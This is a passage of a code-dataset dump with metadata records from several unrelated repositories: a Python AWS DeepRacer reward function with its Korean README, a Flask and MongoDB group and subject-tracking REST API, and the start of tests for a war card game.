[6.50386, 1.41132, 2.5, 0.05764],\n [6.60426, 1.51598, 2.5, 0.05801],\n [6.70214, 1.62407, 2.5, 0.05833],\n [6.79747, 1.73528, 2.5, 0.05859],\n [6.89022, 1.84935, 2.5, 0.05881],\n [6.98037, 1.96604, 2.5, 0.05898],\n [7.06789, 2.08511, 2.5, 0.05911],\n [7.15274, 2.20639, 2.5, 0.0592],\n [7.23487, 2.32968, 2.5, 0.05926],\n [7.31419, 2.45484, 2.5, 0.05927],\n [7.39063, 2.58173, 2.5, 0.05925],\n [7.46407, 2.7102, 2.5, 0.05919],\n [7.53435, 2.84012, 2.47291, 0.05973],\n [7.6013, 2.97136, 2.36324, 0.06234],\n [7.66469, 3.10378, 2.25264, 0.06517],\n [7.72428, 3.23722, 2.14496, 0.06813],\n [7.77975, 3.37151, 2.04552, 0.07103],\n [7.83077, 3.50645, 1.9619, 0.07353],\n [7.87697, 3.6418, 1.90522, 0.07507],\n [7.91792, 3.77731, 1.88858, 0.07496],\n [7.95321, 3.91267, 1.8494, 0.07564],\n [7.9824, 4.04755, 1.80772, 0.07634],\n [8.00509, 4.18158, 1.67543, 0.08114],\n [8.02097, 4.31442, 1.54118, 0.08681],\n [8.02995, 4.44574, 1.41123, 0.09328],\n [8.03221, 4.57534, 1.27802, 0.10142],\n [8.02777, 4.70297, 1.14629, 0.1114],\n [8.01662, 4.82837, 1.0, 0.1259],\n [7.99802, 4.95103, 1.0, 0.12406],\n [7.97105, 5.07025, 1.0, 0.12223],\n [7.93463, 5.18511, 1.0, 0.12049],\n [7.88732, 5.29429, 1.0, 0.11899],\n [7.82726, 5.39584, 1.0, 0.11798],\n [7.75161, 5.48603, 1.11159, 0.1059],\n [7.66434, 5.56576, 1.21676, 0.09715],\n [7.56798, 5.63587, 1.33698, 0.08913],\n [7.46452, 5.69731, 1.42122, 0.08466],\n [7.35516, 5.75051, 1.50371, 0.08088],\n [7.24086, 5.79585, 1.56313, 0.07866],\n [7.12237, 5.83347, 1.6121, 0.07711],\n [7.00035, 5.86342, 1.65126, 0.07609],\n [6.87539, 5.88568, 1.68113, 0.0755],\n [6.74809, 5.90022, 1.70592, 0.07511],\n [6.61903, 5.90698, 1.72741, 0.07481],\n [6.4888, 5.90593, 1.74694, 0.07455],\n [6.35798, 5.89709, 1.75586, 0.07467],\n [6.22714, 5.8805, 1.75586, 0.07511],\n [6.09685, 5.85604, 1.80186, 0.07357],\n [5.96758, 5.82418, 1.80186, 0.07389],\n [5.83982, 5.78483, 1.82574, 0.07322],\n [5.71395, 5.73825, 1.85955, 0.07217],\n [5.5903, 5.68472, 1.9052, 0.07072],\n [5.46907, 5.62464, 1.9671, 0.06878],\n [5.35038, 5.55844, 2.05108, 0.06626],\n [5.23424, 5.48663, 2.1652, 0.06306],\n [5.12056, 5.40981, 2.32107, 0.05911],\n [5.00914, 5.32863, 2.5, 0.05514],\n [4.89973, 5.24377, 2.5, 0.05538],\n [4.79201, 5.15593, 2.45112, 0.0567],\n [4.68576, 5.06561, 2.24857, 0.06202],\n [4.58079, 4.97316, 2.0831, 0.06715],\n [4.48082, 4.88243, 1.96125, 0.06884],\n [4.3796, 4.7942, 1.87697, 0.07154],\n [4.27684, 4.70907, 1.82611, 0.07307],\n [4.17225, 4.6277, 1.80653, 0.07336],\n [4.06554, 4.55072, 1.80653, 0.07284],\n [3.95644, 4.47878, 1.80653, 0.07234],\n [3.84475, 4.41244, 1.80653, 0.07191],\n [3.73031, 4.35215, 1.80653, 0.0716],\n [3.61306, 4.29823, 1.80653, 0.07144],\n [3.49301, 4.25081, 1.81793, 0.071],\n [3.37024, 4.20987, 1.86222, 0.0695],\n [3.24492, 4.17519, 1.94392, 0.06689],\n [3.11726, 4.14637, 2.06986, 0.06323],\n [2.98756, 4.12284, 2.24238, 0.05879],\n [2.85611, 4.10393, 2.43216, 0.0546],\n [2.72319, 4.08902, 2.5, 0.0535],\n [2.58903, 4.07761, 2.45689, 0.0548],\n [2.45387, 4.06945, 2.25692, 0.06],\n [2.31818, 4.06426, 2.07663, 0.06539],\n [2.18532, 4.05625, 1.90257, 0.06996],\n [2.05434, 4.04515, 1.72418, 0.07624],\n [1.92525, 4.03072, 1.53015, 0.08489],\n [1.7982, 4.01267, 1.36907, 0.09374],\n [1.67349, 3.99052, 1.21821, 0.10397],\n [1.55151, 3.96372, 1.07012, 0.11671],\n [1.43274, 3.93163, 1.02891, 0.11957],\n [1.31783, 3.89345, 1.02891, 0.11768],\n [1.20781, 3.84796, 1.02891, 0.11571],\n [1.10389, 3.79392, 1.02891, 0.11383],\n [1.00783, 3.72983, 1.02891, 0.11223],\n [0.92249, 3.6538, 1.02891, 0.11109],\n [0.84978, 3.56631, 1.13536, 0.1002],\n [0.78832, 3.47061, 1.20876, 0.0941],\n [0.73744, 3.36858, 1.26738, 0.08996],\n [0.69672, 3.26166, 1.34505, 0.08506],\n [0.66544, 3.15118, 1.38395, 0.08297],\n [0.6434, 3.03808, 1.39727, 0.08247],\n [0.63046, 2.92322, 1.39727, 0.08273]]\n\n ################## INPUT PARAMETERS ###################\n\n # Read all input parameters\n all_wheels_on_track = params['all_wheels_on_track']\n x = params['x']\n y = params['y']\n distance_from_center = params['distance_from_center']\n is_left_of_center = params['is_left_of_center']\n heading = params['heading']\n progress = params['progress']\n steps = params['steps']\n speed = params['speed']\n steering_angle = params['steering_angle']\n track_width = params['track_width']\n waypoints = params['waypoints']\n closest_waypoints = params['closest_waypoints']\n is_offtrack = params['is_offtrack']\n\n ############### OPTIMAL X,Y,SPEED,TIME ################\n\n # Get closest indexes for racing line (and distances to all points on racing line)\n closest_index, second_closest_index = closest_2_racing_points_index(\n racing_track, [x, y])\n\n # Get optimal [x, y, speed, time] for closest and second closest index\n optimals = racing_track[closest_index]\n optimals_second = racing_track[second_closest_index]\n\n # Save first racingpoint of episode for later\n if self.verbose == True:\n self.first_racingpoint_index = 0 # this is just for testing purposes\n if steps == 1:\n self.first_racingpoint_index = closest_index\n\n ################ REWARD AND PUNISHMENT ################\n\n ## Define the default reward ##\n reward = 1\n\n ## Reward if car goes close to optimal racing line ##\n DISTANCE_MULTIPLE = 1\n dist = dist_to_racing_line(optimals[0:2], optimals_second[0:2], [x, y])\n distance_reward = max(1e-3, 1 - (dist/(track_width*0.5)))\n reward += distance_reward * DISTANCE_MULTIPLE\n\n ## Reward if speed is close to optimal speed ##\n SPEED_DIFF_NO_REWARD = 1\n SPEED_MULTIPLE = 2\n speed_diff = abs(optimals[2]-speed)\n if speed_diff <= SPEED_DIFF_NO_REWARD:\n # we use quadratic punishment (not linear) bc we're not as confident with the optimal speed\n # so, we do not punish small deviations from optimal speed\n speed_reward = (1 - (speed_diff/(SPEED_DIFF_NO_REWARD))**2)**2\n else:\n speed_reward = 0\n reward += speed_reward * SPEED_MULTIPLE\n\n # Reward if less steps\n REWARD_PER_STEP_FOR_FASTEST_TIME = 1\n STANDARD_TIME = 16\n FASTEST_TIME = 8\n times_list = [row[3] for row in racing_track]\n projected_time = projected_time(\n self.first_racingpoint_index, closest_index, steps, times_list)\n try:\n steps_prediction = projected_time * 15 + 1\n reward_prediction = max(1e-3, (-REWARD_PER_STEP_FOR_FASTEST_TIME*(FASTEST_TIME) /\n (STANDARD_TIME-FASTEST_TIME))*(steps_prediction-(STANDARD_TIME*15+1)))\n steps_reward = min(REWARD_PER_STEP_FOR_FASTEST_TIME,\n reward_prediction / steps_prediction)\n except:\n steps_reward = 0\n reward += steps_reward\n\n # Zero reward if obviously wrong direction (e.g. spin)\n direction_diff = racing_direction_diff(\n optimals[0:2], optimals_second[0:2], [x, y], heading)\n if direction_diff > 30:\n reward = 1e-3\n\n # Zero reward of obviously too slow\n speed_diff_zero = optimals[2]-speed\n if speed_diff_zero > 0.5:\n reward = 1e-3\n\n ## Incentive for finishing the lap in less steps ##\n # should be adapted to track length and other rewards\n REWARD_FOR_FASTEST_TIME = 500\n STANDARD_TIME = 16 # seconds (time that is easily done by model)\n FASTEST_TIME = 8 # seconds (best time of 1st place on the track)\n if progress > 99.5 :\n finish_reward = max(1e-3, (-REWARD_FOR_FASTEST_TIME /\n (15*(STANDARD_TIME-FASTEST_TIME)))*(steps-STANDARD_TIME*15))\n else:\n finish_reward = 0\n reward += finish_reward\n\n ## Zero reward if off track ##\n if all_wheels_on_track == False:\n reward = 1e-3\n\n ####################### VERBOSE #######################\n\n if self.verbose == True:\n print(\"Closest index: %i\" % closest_index)\n print(\"Distance to racing line: %f\" % dist)\n print(\"=== Distance reward (w/out multiple): %f ===\" % (distance_reward))\n print(\"Optimal speed: %f\" % optimals[2])\n print(\"Speed difference: %f\" % speed_diff)\n print(\"=== Speed reward (w/out multiple): %f ===\" % speed_reward)\n print(\"Direction difference: %f\" % direction_diff)\n print(\"Predicted time: %f\" % projected_time)\n print(\"=== Steps reward: %f ===\" % steps_reward)\n print(\"=== Finish reward: %f ===\" % finish_reward)\n\n #################### RETURN REWARD ####################\n\n # Always return a float value\n return float(reward)\n\n\nreward_object = Reward() # add parameter verbose=True to get noisy output for testing\n\n\ndef reward_function(params):\n return reward_object.reward_function(params)\n" }, { "alpha_fraction": 0.7238193154335022, "alphanum_fraction": 0.7484599351882935, "avg_line_length": 66.13793182373047, "blob_id": "7051ac2578d7c79fdd6282c64197ab4106880323", "content_id": "e0612cf9a73760a8714066a0e6462ce9f07f9c2b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3098, "license_type": "no_license", "max_line_length": 244, "num_lines": 29, "path": "/README.md", "repo_name": "rheehot/Capstone_AWS_DeepRacer", "src_encoding": "UTF-8", "text": "\n\n*AWSKRUG에서 활용을 위해 ReInvent2019의 기본 데이터로 바꾸었습니다.\n원문은 아래 깃헙과 블로그를 참고하세요. 구글 번역기로 대충 번역 해 두었습니다.\n`dummy-model-for-import/model/model_metadata.json`의 `action_space`를 계산된 값으로 바꾸고 \ndummy-model-for-import를 통째로 S3로 업로드 후 import_model하고 다시 clone 해서 사용하세요.\n`reward function`과 `hyperparameter`는 model을 clone할 때 변경 가능합니다.*\n\n[원본 깃헙](https://github.com/dgnzlz/Capstone_AWS_DeepRacer) , [설명 블로그](https://towardsdatascience.com/an-advanced-guide-to-aws-deepracer-2b462c37eea)\n\n----\n# Capstone Project : ESADE Business School 비즈니스 분석 석사 과정용\n\n**이 리포지토리에는 \"A Advanced Guide to AWS DeepRacer-Autonomous Formula 1 Racing using Reinforcement Learning\"기사에 사용 된 코드가 포함되어 있습니다. 먼저 [여기를 클릭](https://towardsdatascience.com/an-advanced-guide-to-aws-deepracer-2b462c37eea)해서 블로그의 내용을 읽어 보시길 바랍니다.**\n\n\n- `Compute_Speed_And_Actions` 폴더 : [이곳](https://github.com/cdthompson/deepracer-k1999-race-lines) 저장소에서 최적의 레이싱 라인을 가져와 최적의 속도를 계산하는 jupyter 노트북이 포함되어 있습니다. \n또한 K-Means 클러스터링을 사용하여 사용자 지정 작업 공간을 계산합니다. 이 폴더에는 cdthompson의 K1999 레이싱 라인 노트북도 들어 있는데, 트랙의 내부 `80 %` 만 사용할 수 있도록 변경했습니다.\n- `Reward_Function` 폴더 : ~~우리 팀이 2020 년 5 월 F1 이벤트의 타임 트라이얼 부문 참가자 1291 명 중 12 위를 차지하는 데 사용한 보상 기능이 포함 된 .py 파일이 있습니다.~~\n ==> *활용 예시를 위해 **ReInvent2019의 기본 데이터로 바꾸었습니다**. 최적화된 데이터가 아닌 기본 데이터 입니다. 기존 데이터는 [여기 원본 깃헙](https://github.com/dgnzlz/Capstone_AWS_DeepRacer)을 확인해 주세요.*\n- `Selenium_Automation` 폴더 : jupyter 노트북이 포함되어있어 AWS CLI를 사용하지 않고 모델을 경주에 여러 번 제출할 수 있습니다. 보너스로 하이퍼 파라미터로 실험을 자동으로 수행 할 수도 있습니다. 몇 시간마다 수동으로 설정할 필요없이 밤새 여러 실험을 수행하는 데 사용할 수 있습니다.\n\n## 사용 된 GitHub 저장소\n- 최적의 레이싱 라인 계산 : https://github.com/cdthompson/deepracer-k1999-race-lines\n- 로그 분석 : https://github.com/aws-deepracer-community/deepracer-analysis\n- 트랙 데이터 검색 : https://github.com/aws-deepracer-community/deepracer-simapp/tree/master/bundle/deepracer_simulation_environment/share/deepracer_simulation_environment/routes\n\n## 라이선스\n원하는대로 코드를 자유롭게 사용, 배포 및 변경할 수 있습니다.\n\n이것은 완성 된 대학 프로젝트입니다. 따라서 우리는 더 이상 코드를 유지하지 않을 것입니다." } ]
3
shenrenguo/gt-api
https://github.com/shenrenguo/gt-api
698766d5bec501d9324786ec85d42a27b6996594
2fb1179dbaa7bb8f26564aa6d448084c34e70567
940151c85acf4724664965988788861098dc856c
refs/heads/master
2016-08-05T15:01:30.109970
2013-12-25T07:50:48
2013-12-25T07:50:48
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5674415230751038, "alphanum_fraction": 0.5713276267051697, "avg_line_length": 24.228164672851562, "blob_id": "dec83855111edbb7d00e0d5e7260dbd358582d48", "content_id": "e64fb4d6143789ee9c19a475c62976e8439df2f7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14153, "license_type": "no_license", "max_line_length": 116, "num_lines": 561, "path": "/gt.py", "repo_name": "shenrenguo/gt-api", "src_encoding": "UTF-8", "text": "# coding=utf-8\nfrom datetime import *\nfrom flask import Flask, jsonify, request\nfrom functools import wraps\nfrom pymongo import *\n\n# mongodb configuration\nMONGODB_HOST = 'localhost'\nMONGODB_PORT = 27017\nMONGODB_DB = 'GT'\n\n# create the application object\napp = Flask(__name__)\napp.config.from_object(__name__)\n\n# connect to the database\nconnection = Connection(app.config['MONGODB_HOST'], app.config['MONGODB_PORT'])\ndb = connection[app.config['MONGODB_DB']]\n\n\[email protected](401)\ndef not_authorization():\n message = {\n \"status\": 401,\n \"message\": \"Not Authorization: \" + request.url,\n }\n r = jsonify(message)\n r.status_code = 401\n return r\n\n\[email protected](404)\ndef not_found():\n message = {\n \"status\": 404,\n \"message\": \"Not Found: \" + request.url,\n }\n r = jsonify(message)\n r.status_code = 404\n return r\n\n\[email protected](500)\ndef internal_error(error=None):\n message = {\n \"status\": 500,\n \"message\": \"Internal server error.\",\n }\n r = jsonify(message)\n r.status_code = 500\n return r\n\n\ndef check_auth(uid, pwd):\n \"\"\"This function is called to check if a username /\n password combination is valid.\n \"\"\"\n u = db.users.find_one({\"$or\": [{\"_id\": uid}, {\"email\": uid}]})\n return (u is not None) and (u.get(\"pwd\", None) == pwd)\n\n\ndef requires_auth(f):\n @wraps(f)\n def decorated(*args, **kwargs):\n auth = request.authorization\n if not auth or not check_auth(auth.username, auth.password):\n return not_authorization()\n return f(*args, **kwargs)\n return decorated\n\n\[email protected]('/')\n@requires_auth\ndef index():\n return jsonify(ok=True)\n\n\[email protected]('/sign/<uid>,<email>,<pwd>,<nick>')\ndef new_user(uid, email, pwd, nick):\n \"\"\" sign a new user.\n @param uid:\n @param email:\n @param pwd:\n @param nick:\n \"\"\"\n u = {\"_id\": uid, \"email\": email, \"pwd\": pwd, \"nick\": nick}\n db.users.insert(u)\n\n return jsonify(u)\n\n\[email protected]('/login/<uid>,<pwd>')\ndef login(uid, pwd):\n \"\"\"user login\n\n @param uid: userId or email\n @param pwd:\n @return:\n \"\"\"\n u = db.users.find_one({\"$or\": [{\"_id\": uid}, {\"email\": uid}]})\n\n if u is None:\n return not_authorization()\n if u.get(\"pwd\", None) != pwd:\n return not_authorization()\n\n return jsonify()\n\n\[email protected]('/users')\ndef get_all_users():\n \"\"\"get all users\n\n @return:\n \"\"\"\n cursor_u = db.users.find({}, {\"email\": 1, \"nick\": 1}).sort(\"_id\", ASCENDING)\n users = [u for u in cursor_u]\n cursor_u.close()\n\n return jsonify(result_set=users)\n\n\[email protected]('/groups/add/<uid>,<title>,<brief>')\ndef new_group(uid, title, brief):\n \"\"\"add a new group\n\n @param uid: user id of the owner\n @param title: title of group\n @param brief: brief of group\n @return:\n \"\"\"\n g = {\"_id\": get_serial_id(\"serial_group\"), \"title\": title, \"brief\": brief, \"uid\": uid, \"members\": [uid]}\n db.groups.insert(g)\n\n return jsonify(g)\n\n\[email protected]('/groups/upd/<int:gid>,<title>,<brief>')\ndef update_group(gid, title, brief):\n \"\"\"update group specified.\n\n @param gid: group id of specified group\n @param title: the new title of group\n @param brief: the new brief of group\n @return:\n \"\"\"\n db.groups.update({\"_id\": gid}, {\"$set\": {\"title\": title, \"brief\": brief}})\n\n return jsonify()\n\n\[email protected]('/groups/del/<int:gid>')\ndef delete_group(gid):\n \"\"\"delete the specified group\n\n @param gid: id of group to be delete\n @return:\n \"\"\"\n db.groups.remove({\"_id\": gid})\n\n return jsonify()\n\n\[email protected]('/groups/add_member/<int:gid>,<uid>')\ndef add_group_member(gid, uid):\n \"\"\"add a member user to a group\n\n @param gid: group id\n @param uid: user ids split by \",\" to be add\n @return:\n \"\"\"\n db.groups.update({\"_id\": gid}, {\"$addToSet\": {\"members\": {\"$each\": uid.split(',')}}})\n\n return jsonify()\n\n\[email protected]('/groups/del_member/<int:gid>,<uid>')\ndef delete_group_member(gid, uid):\n \"\"\"delete a member from a group\n\n @param gid: group id\n @param uid: user ids split by \"\", to be delete\n @return:\n \"\"\"\n for u in uid.split(','):\n db.groups.update({\"_id\": gid}, {\"$pull\": {\"members\": u}})\n\n return jsonify()\n\n\[email protected]('/groups/<int:gid>/members')\ndef get_group_members(gid):\n \"\"\"get members of group specified.\n\n @param gid: group id\n @return:\n \"\"\"\n g = db.groups.find_one({\"_id\": gid})\n\n members = []\n cursor_u = db.users.find({\"_id\": {\"$in\": g.get(\"members\", [])}}, {\"email\": 1, \"nick\": 1})\n for u in cursor_u:\n members.append(u)\n cursor_u.close()\n\n return jsonify(result_set=members)\n\n\[email protected]('/groups')\ndef get_all_groups():\n \"\"\"get all groups\n\n @return:\n \"\"\"\n groups = []\n cursor_g = db.groups.find({}, {\"title\": 1, \"brief\": 1, \"uid\": 1}).sort(\"title\", ASCENDING)\n for g in cursor_g:\n groups.append(g)\n cursor_g.close()\n\n return jsonify(result_set=groups)\n\n\[email protected]('/<uid>/groups')\ndef get_user_groups(uid):\n \"\"\"get the user owned & joined groups\n\n @param uid:\n @return:\n \"\"\"\n groups_owned = []\n groups_joined = []\n cursor_g = db.groups.find({\"members\": uid}, {\"members\": 0}).sort(\"title\", ASCENDING)\n for g in cursor_g:\n if g.get(\"uid\", None) == uid:\n groups_owned.append(g)\n else:\n groups_joined.append(g)\n cursor_g.close()\n\n return jsonify(owned=groups_owned, joined=groups_joined)\n\n\[email protected]('/<uid>/companions')\ndef get_user_companions(uid):\n \"\"\"get all companions of specified user\n\n @param uid: user id\n @return:\n \"\"\"\n companions = []\n\n cursor_group = db.groups.find({\"members\": uid})\n for g in cursor_group:\n members = g.get(\"members\", [])\n for m in members:\n if m == uid:\n continue\n\n existed = False\n for c in companions:\n if c.get(\"_id\", None) == m:\n c[\"from\"].append({\"owner_id\": g[\"uid\"], \"title\": g[\"title\"]})\n existed = True\n break\n\n if not existed:\n u = db.users.find_one({\"_id\": m})\n if u is None:\n continue\n else:\n companions.append({\"_id\": u[\"_id\"], \"email\": u[\"email\"], \"nick\": u[\"nick\"],\n \"from\": [{\"owner_id\": g[\"uid\"], \"title\": g[\"title\"]}]})\n\n return jsonify(result_set=companions)\n\n\[email protected]('/subjects/add/<uid>,<title>,<brief>,<objective>')\ndef new_subject(uid, title, brief, objective):\n \"\"\"add a new subject\n\n @param uid: user id\n @param title: title of subject\n @param brief: brief of subject\n @param objective: objective of subject\n @return:\n \"\"\"\n subject = {\"_id\": get_serial_id(\"serial_subject\"), \"title\": title, \"brief\": brief, \"objective\": objective,\n \"is_active\": True, \"uid\": uid}\n db.subjects.insert(subject)\n\n return jsonify(subject)\n\n\[email protected]('/subjects/upd/<int:sid>,<title>,<brief>,<objective>')\ndef update_subject(sid, title, brief, objective):\n \"\"\"update subject specified\n\n @param sid: subject id\n @param title:\n @param brief:\n @param objective:\n @return:\n \"\"\"\n db.subjects.update({\"_id\": sid}, {\"$set\": {\"title\": title, \"brief\": brief, \"objective\": objective}})\n\n return jsonify()\n\n\[email protected]('/subjects/del/<int:sid>')\ndef delete_subject(sid):\n \"\"\"delete subject specified\n\n @param sid: subject id to be delete\n @return:\n \"\"\"\n db.subjects.remove({\"_id\": sid})\n return jsonify()\n\n\[email protected]('/subjects/on/<int:sid>')\ndef on_subject(sid):\n \"\"\"active subject specified\n\n @param sid: subject id to be active\n @return:\n \"\"\"\n db.subjects.update({\"_id\": sid}, {\"$set\": {\"is_active\": True}})\n return jsonify()\n\n\[email protected]('/subjects/off/<int:sid>')\ndef off_subject(sid):\n \"\"\"de active subject\n\n @param sid: subject id to be de active\n @return:\n \"\"\"\n db.subjects.update({\"_id\": sid}, {\"$set\": {\"is_active\": False}})\n db.subjects.update({\"_id\": sid}, {\"$unset\": {\"groups\": 1}})\n return jsonify()\n\n\[email protected]('/subjects/share/<int:sid>,<gid>')\ndef share_subject(sid, gid):\n \"\"\"share subject specified to groups specified\n\n @param sid: subject id to be share\n @param gid: group id list split by \",\"\n @return:\n \"\"\"\n db.subjects.update({\"_id\": sid}, {\"$addToSet\": {\"groups\": {\"$each\": [int(e) for e in gid.split(',')]}}})\n\n return jsonify()\n\n\[email protected]('/subjects/grade/<serial_points>')\ndef grade_subject(serial_points):\n \"\"\"today grade, grade the current subject\n\n @param serial_points: grade points serial string,like:<sid:points>[,<sid:points>]\n @return:\n \"\"\"\n today = date.today().strftime(\"%F %T\")\n\n for pair in [e.split(':') for e in serial_points.split(',')]:\n sid = int(pair[0])\n points = int(pair[1])\n\n if db.subjects.find_one({\"_id\": sid, \"records.dt\": today}):\n db.subjects.update({\"_id\": sid, \"records.dt\": today}, {\"$set\": {\"records.$.points\": points}})\n else:\n db.subjects.update({\"_id\": sid}, {\"$push\": {\"records\": {\"dt\": today, \"points\": points}}})\n\n return jsonify()\n\n\[email protected]('/subjects/<uid>')\ndef get_subjects(uid):\n \"\"\"get all subjects of user specified\n\n @param uid: user id\n @return:\n \"\"\"\n subjects = []\n cursor_s = db.subjects.find({\"uid\": uid}, {\"records\": 0})\n for s in cursor_s:\n shared_to = s.get(\"groups\", [])\n s[\"groups\"] = []\n for gid in shared_to:\n group = db.groups.find_one({\"_id\": gid}, {\"uid\": 1, \"title\": 1})\n s[\"groups\"].append({\"_id\": group[\"_id\"], \"uid\": group[\"uid\"], \"title\": group[\"title\"]})\n\n if not s[\"groups\"]:\n del s[\"groups\"]\n\n subjects.append(s)\n cursor_s.close()\n\n return jsonify(result_set=subjects)\n\n\[email protected]('/subjects/<uid>/current')\ndef get_current_subjects(uid):\n \"\"\"get the active subjects of user specified\n\n @param uid: user id\n @return:\n \"\"\"\n subjects = []\n cursor_s = db.subjects.find({\"uid\": uid, \"is_active\": True})\n for s in cursor_s:\n shared_to = s.get(\"groups\", [])\n s[\"groups\"] = []\n for gid in shared_to:\n group = db.groups.find_one({\"_id\": gid}, {\"uid\": 1, \"title\": 1})\n s[\"groups\"].append({\"_id\": group[\"_id\"], \"uid\": group[\"uid\"], \"title\": group[\"title\"]})\n\n if not s[\"groups\"]:\n del s[\"groups\"]\n\n subjects.append(s)\n cursor_s.close()\n\n return jsonify(result_set=subjects)\n\n\[email protected]('/subjects/<uid>/history')\ndef get_history_subjects(uid):\n \"\"\"get the de active subjects of user specified\n\n @param uid: user id\n @return:\n \"\"\"\n subjects = []\n cursor_s = db.subjects.find({\"uid\": uid, \"is_active\": False})\n for s in cursor_s:\n subjects.append(s)\n cursor_s.close()\n\n return jsonify(result_set=subjects)\n\n\[email protected]('/subjects/<uid>/<cid>')\ndef get_companion_subjects(uid, cid):\n \"\"\"get subjects that companion specified shared to the user.\n\n @param uid: user id\n @param cid: companion's user id\n @return:\n \"\"\"\n\n cursor_group = db.groups.find({\"members\": uid})\n my_group = [g[\"_id\"] for g in cursor_group]\n cursor_group.close()\n\n subjects = []\n cursor_s = db.subjects.find({\"uid\": cid, \"is_active\": True})\n for s in cursor_s:\n shared_to = s.get(\"groups\", [])\n intersection = [g for g in shared_to if g in my_group]\n\n s[\"groups\"] = []\n for gid in intersection:\n group = db.groups.find_one({\"_id\": gid}, {\"uid\": 1, \"title\": 1})\n s[\"groups\"].append({\"_id\": group[\"_id\"], \"uid\": group[\"uid\"], \"title\": group[\"title\"]})\n\n if not s[\"groups\"]:\n del s[\"groups\"]\n\n subjects.append(s)\n\n return jsonify(result_set=subjects)\n\n\[email protected]('/memberships/add/<int:gid>,<direction>,<uid>,<notes>')\ndef new_membership(gid, direction, uid, notes):\n \"\"\"the specified user ask a membership for specified group\n\n @param gid: group id\n @param direction: A(ask) or I(invite)\n @param uid: user id\n @return:\n \"\"\"\n\n g = db.groups.find_one({\"_id\": gid}, {\"members\": 0})\n u = db.users.find_one({\"_id\": uid})\n\n m = {\"_id\": get_serial_id(\"serial_membership\"), \"group\": g, \"direction\": direction, \"user\": u, \"notes\": notes,\n \"dt\": str(datetime.now())}\n\n db.memberships.insert(m)\n\n return jsonify()\n\n\[email protected]('/memberships/acc/<int:mid>')\ndef accept_membership(mid):\n \"\"\"accept & delete the specified membership\n\n @param mid: membership id\n @return:\n \"\"\"\n m = db.memberships.find_one({\"_id\": mid})\n\n db.groups.update({\"_id\": m[\"group\"][\"_id\"]}, {\"$addToSet\": {\"members\": m[\"user\"][\"_id\"]}})\n db.memberships.remove({\"_id\": mid})\n\n return jsonify()\n\n\[email protected]('/memberships/del/<int:mid>')\ndef delete_membership(mid):\n \"\"\"delete the specified membership\n\n @param mid: membership id\n @return:\n \"\"\"\n db.memberships.remove({\"_id\": mid})\n\n return jsonify()\n\n\[email protected]('/memberships/<uid>')\ndef get_memberships(uid):\n \"\"\"get user's received membership message\n\n @param uid: user id\n @return:\n \"\"\"\n cursor_group = db.groups.find({\"uid\": uid})\n my_group = [g[\"_id\"] for g in cursor_group]\n cursor_group.close()\n\n cursor_ask = db.memberships.find({\"group._id\": {\"$in\": my_group}, \"direction\": \"A\"})\n ask = [m for m in cursor_ask]\n cursor_ask.close()\n\n cursor_invite = db.memberships.find({\"user\": uid, \"direction\": \"I\"})\n invite = [m for m in cursor_invite]\n cursor_invite.close()\n\n return jsonify(ask=ask, invite=invite)\n\n\ndef get_serial_id(serial_name):\n serial_id = db.serials.find_and_modify(query={\"_id\": serial_name}, update={\"$inc\": {\"current_id\": 1}}, new=True)\n\n if serial_id is None:\n db.serials.insert({\"_id\": serial_name, \"current_id\": 1})\n serial_id = db.serials.find_and_modify(\n query={\"_id\": serial_name},\n update={\"$inc\": {\"current_id\": 1}},\n new=True)\n\n return serial_id[\"current_id\"]\n\n\nif __name__ == '__main__':\n app.debug = False\n app.run()\n" } ]
1
iluisdaniel/war_card_game_python
https://github.com/iluisdaniel/war_card_game_python
db1548229646689acda625724eb4bbf9c92826da
c428e51e1c2ab8de3214d123e470b443701f938b
8e98db19702970b46748a7a78b092d9a8f428ddb
refs/heads/master
2022-06-18T10:32:42.670351
2020-05-01T20:16:49
2020-05-01T20:16:49
260,390,852
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6223625540733337, "alphanum_fraction": 0.6576312780380249, "avg_line_length": 36.10285568237305, "blob_id": "266b1620b5fe106bb618c2de7f7e28a22973cf7c", "content_id": "c6b195ddafef1c4432b96c0be80de3bcdc6c3835", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6493, "license_type": "no_license", "max_line_length": 277, "num_lines": 175, "path": "/tests/test_game.py", "repo_name": "iluisdaniel/war_card_game_python", "src_encoding": "UTF-8", "text": "import sys\nsys.path.insert(0,'..')\n\nfrom war_game import Game\n\n\ndef test_game_set_up():\n\tprint(\"########## Testing the game is setup correctly\")\n\tg = Game([\"Luis\", \"Computer\"])\n\tassert len(g.player1.hand.cards) == 26 and len(g.player2.hand.cards) == 26, \"players cards should be 26\"\n\n\ndef test_player1_higher_Card():\n\tprint(\"########## Testing Player 1 with higher card\")\n\tg = Game([\"Luis\", \"Computer\"])\n\tg.player1.hand.empty_the_hand()\n\tg.player2.hand.empty_the_hand()\n\n\tplayer1_cards = [['spades', '6'], ['diamonds', '7'], ['spades', '3'], ['hearts', '10']]\n\tplayer2_cards= [['clubs', 'K'], ['clubs', '5'], ['diamonds', '8'], ['hearts', '5']]\n\n\tg.player1.hand.add_cards(player1_cards)\n\tg.player2.hand.add_cards(player2_cards)\n\n\tplayer1_deck_size_before = len(g.player1.hand.cards)\n\tplayer2_deck_size_before = len(g.player2.hand.cards)\n\n\tplayer1_card = g.player1.hand.play_card()\n\tplayer2_card = g.player2.hand.play_card()\n\n\tg.check_cards(player1_card, player2_card)\n\n\tg.table_cards.clear()\n\n\tassert (len(g.player1.hand.cards) == player1_deck_size_before + 1) and (len(g.player2.hand.cards) == player2_deck_size_before - 1), \"Player 1 should have one more card, and player two should have one less\"\n\ndef test_player2_higher_Card():\n\tprint(\"########## Testing Player 2 with higher card\")\n\tg = Game([\"Luis\", \"Computer\"])\n\tg.player1.hand.empty_the_hand()\n\tg.player2.hand.empty_the_hand()\n\n\tplayer1_cards = [['diamonds', '6'], ['clubs', '7'], ['spades', '3'], ['spades', '2']]\n\tplayer2_cards= [['hearts', 'K'], ['spades', '5'], ['diamonds', '8'], ['diamonds', 'A']]\n\n\tg.player1.hand.add_cards(player1_cards)\n\tg.player2.hand.add_cards(player2_cards)\n\n\tplayer1_deck_size_before = len(g.player1.hand.cards)\n\tplayer2_deck_size_before = len(g.player2.hand.cards)\n\n\tplayer1_card = g.player1.hand.play_card()\n\tplayer2_card = g.player2.hand.play_card()\n\n\tg.check_cards(player1_card, 